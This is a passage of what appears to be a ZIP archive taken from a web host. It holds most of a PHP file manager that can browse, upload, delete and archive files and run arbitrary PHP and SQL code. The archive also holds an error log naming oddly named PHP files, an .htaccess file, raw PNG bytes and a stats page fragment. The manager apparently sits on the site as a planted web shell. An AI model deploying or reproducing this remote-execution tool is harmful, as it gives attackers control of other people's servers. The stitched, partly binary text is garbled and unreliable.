$path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/henriyzx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> PK @)�[��J J error_lognu �[��� [12-Aug-2025 03:12:25 UTC] PHP Warning: Unknown: Failed to open stream: No such file or directory in Unknown on line 0 [12-Aug-2025 03:12:25 UTC] PHP Fatal error: Failed opening required '/home/gqdcvggs/account.imators.com/akcc.php' (include_path='.:/opt/cpanel/ea-php81/root/usr/share/pear') in Unknown on line 0 [05-Dec-2025 19:05:25 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/henriyzx/Filemanager/master/languages/en.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gqdcvggs/account.imators.com/xtride.php on line 92 PK @)�[6O}� .htaccessnu �[��� # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit PK J�[��O failref.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��Mr�8�� No'�A*W� ����֓��?$ �iI��U�DA�齦�.J��oR�~�_{��y��~�{_o�7Y+S/�ߒ����`�q��/���B�`!D�"X,�B!���B�`!D�"X,�B!��P9,^m]�X�o��^�j3,)_��������P���0o�%���������#* V��� �����w�LKjV�OV�Y����~����p}w��`��G�Q�����N�< �����^ X��k��0��=�G�u�ˠy����c�a�RQX=&1_�J��0����2�iX���ȅ�J����'ֺ`e��*[���7�ʃ�X9e�VB���J���r,�`���8������.ut�`��r`��V��z��ȁ�<X��L��. �`B]�Օ�2,�S��M'[C�� +Y�,,Ʉ�^�F�����j��Pi�X�@ �`�ʖCKo}ӈ�`�6�B:���Ұ��Z+D� T�Z���BX� .`���f�,�k,R��p�9? V�7�IX�������Kу5ԭ�t���`qn.#v����2_&dm�+d���f �w��w �L)X�v[+�Y+ ry�J�� ��i�$`]�@sa�Ҭ���� Y+V']�8���[�3V'�ʄ[��i��l\mEa�[-X�ZX����gp�3O����� �=X~� ��ݛ��ú8�@k!`���lf����̸�lX��*��Y�fָpɦ������l��rS[+T�,,��6���r#1�p:��r�����$a o��a����Ё�g���iȨރk��4��2��n°�s�����%���r�#,�Z�a�~��r3(��#,��ڤ��uY����ȡ��g��Yc����9�~l�.X�>W��X0���lX��,�Y���Ph������,@�=��Z���'���C� c��:}�ke-�5 Ha1���0 4�:�HX���y�m��5����VUX��Y�}��pm-$,(���~փ{X�S���Z[��V V�����7�`A���{XiX��r������Y���J`]�[4���J`-����=�$�`�*��.ZX�~��=�$���9��Z[˃��a��Y�,����Y^I�X ������s0}�CH<�ۏְ+��+Z���a��M�������<k�ba-s8������@[`�֪�\���oO��N�.;����n�zT �� -c �T��r���,ZaX��z;6�Z̿�YiX��j��t���d���z s�O������|\5`�б���ֵ��� ���Q��Lck�d���3�4gN }���J��2X�!Xn�&t����R�&����%� c����� ���t������i�e�l?���ohʲc>n�9v�1��yU���B�ZxX�.`%�7����'!�t�3�C`e{���,�ɨ�$R��`�֪+y����,��b��]b�^l�(flȹv�{&�п��� �Z�,�Y��H�p&q��z��d��栅: �,�ˋa���uX�`e�k��a�������BX�`=�ۨ���[��uɅ�s���WxK톎\�`]+Ú�Z�X�Z�&,i:M�Q�Z� M��pZ���km����1�Ku@����%�Z��`�֪kn?Q��u3K�cV�RXך���2X�� a�I���e-�E� �º,���Z�`,@ŰnO��YxX���a�᎔��q�6R�k3���UB�`�z&XŤ����'<%�J�� V=R�êJ�kX�ʤ��U�6�Y`�!�#�f�z�����!���vh X�Iu�5��`�gE����5X�vgH�0"X�O�k^�N[�F!���B��Ƭλ3$X�C=��B!�c욲:q�"X,�B�'�6��'���Q7dufc,�B!�;,V�3��W�4cujc,��otj��S��`aD� |�a#V�.Y��md�s�`a���&�N���n7��ɍE�0 �j�ó�0����n,��QV��>�aX��uzc,�°j��)���m���`a�U7��0���:0VVMk�`���:�7`���}�CƊêW�z�X)X��؇�FqX�r�G S��X��]!Kª�C�$�iX5��I3`��c=V/+Vq���X�J�V7+VY� a�� v�<XA|�(����fZ]�ʃ��l�T�X.��e���Ųam*[},�kK��U6� e������e����0���`*�! *��e��`!��aVn�{� ���|�'*4,��Q�]֫QXX�(�w�j�x�;�q���Pe��]k�A ��8i#���rըͰ�4������Q������*��D"X,�B!���B�`!D�"X,�B��d�rud=T^v���/�pa� �x|��b��jF�[�)���m 2` n��#�r~��1u=Gn�)��z�����a�tу��9ws1ͭGr�g����LM���zN�&�Yvk�m���� �#����c�3�te��M��3w�j��#V+ �?J`� P/,��=�KT� z�����<s`�݈~,SΒ���-W@�w)�S ��:n��/� ��n7�ss`I�;�˝����Y��Z��`;֭�i]Md�yy���K��5^�1L�}��@ic8? �;�Գ�P��)�0,]D�\��S�'z��r>]���3ugw�u��Bo�W�=�N�z���D����/e������̴S��N��s��(����!���B�`!D�"X,�B!���B�`!D�"X,�,I����)K/���W�,����X�zad�l��ʐH�] IEND�B`�PK J�[�9� � size.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� +IDATx���Qr�6`��;��nn����=@����?B%R�%R$ �H�'M��l�I��F��!�w�~�Kh�.�㯳_C+���>���u��>���f�AIJ�Q��(�B�`!J�%X�,D �Q��(�B�`!J�%X�,D �QDZ4�k��`��b>�+������u��.oo���2�}�����Za���ɽ�J����b�]X��������ˬ�B,�Y�bis�%��,��ZH�ucX�W�Q�a���5^���y�����u�~��U�T,XE��,�+��>����$±�&�8&����}�q�b�D(�� ��w�ڷJc}q�b��]��� c�>��o�' ��?��X��` ��y�4[�+Vd`� c��҃����7u~�AXQ��q��[>�0̷���� Vl`��ck?�O�ư���[,��U�V3+�ۼF㭔^��4��J��� "+�Tw��f���j�h�!+DkU������ƪ�rX�`�#r��Je�2��f�&�� !��bM+�X>�����4V���XLZ�t,�����QW+w(�"#+��-���=Ӫ�<+?��X��kY�6���b�~�!+� ֲz���`}o�b#��.��K���ʱ )�cŦV뱞�6�-�W�X[�D ���,S{A�����,��`��cMG�g(�[��Ȋ�p��V���Yn㴵��,Xca��[k�Yu��X-U�� VrdEs�PŰ����j��Q1,` 7X�� �,hc�Z���Q�"�ʥ��^ ��gASx�]X{9��+��U� ���X;��cy�W���↕Y ,�J�a�|mO!k'�{X��gռ�u.�f��bU��U�Y���bX�zbd!�¡�����Ϫyf!�����^���׳��F��k�B,V��dX� V�X����jz��k��B4��÷����7|�c}�a����;� :�X�Խ5,��Bc�CK�J��k���y*�� � k��,cGM�b�F�Za{-]ca�S�j�\!.�x,/������t�iX�y�Q�C�� ��ӱZ*�BT��<:,��jxIK�u�f�5v����X�Nx�B jd �`���N����f���( ,��,��mQ`��%XA�,vd �`��F���QXX+>X���f�hw>�|:����� ��b��_��^�JB�+VQ{�*��˔Yu�U6�:���!��8�=b��^�)a�+4�XB�V�{�X��:�:BNX����{0,�:f��r����!lxd`�� �ȩ{oXGVWX�`����!l�`��"!/�TG�vS��"a7X!�Z#�U�#�E�N�hB����g�X��Ȫ�����B�tcA��B��UXT!d�Lx��=�a�J�Ϊ��aќ�s���n`5�B�(XK�C�K�&������)��n�,i�b�W���f~�6�\�7V�֊-��a�)�bͭE��+�El�KS���Ʊ����o��k,Ml�~ Xԭ�~c �X�9d��mk1h�$ekqh�ê�7ab+���V�X4V�njq�X9,� �h,��T�*�<R�âi-�B��"9 2 a�"�LB�:D6��X\& �����X ��S���a"����QaX���(�@,]��� �U<�8 ,�*[��c�-^K��J�7+0V��b6�=�� ,��B��aB*��2�pX�$2̠BbA���1� �<��I��R:E�r^ͅ��F�-U V:��.q�U�5E1�E�t�/U�5�.��*Ě�Ʈ�j�b,�ƹF�?�]5����^K�u��,D �Q��(�B�`!J�%X�,D �Q��d5&�2N^*�� �{@�`�n�[�b���%���v�����5D�_�a X�=��5�®z�n�'�؏������bL[�m�������z��^��7���m�I�;�����7�4��n��;,� ��6��;��f?���m���Q�s {]~j��pz�A���^/[�,�G�����7�ºF���l��5�G��+��>��أ���"���[�t�Za�����X�=<���Tms+�e��=2�=WO�e$ݱ��>ʵ�v��dz=��ݟ�左 �c-�ux�l��a9�e���Հ_Z����B/C���~٧�z쳲�K��o�^���.��N�ۛz#�Q�MPrm�(�B�`!J�%X�,D �Q��(�B�`!J�%X�,D ���Ռ��&�˄u9�E�R�ߔ4�.J\��nL!��wQG IEND�B`�PK J�[O]0� � 2.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> 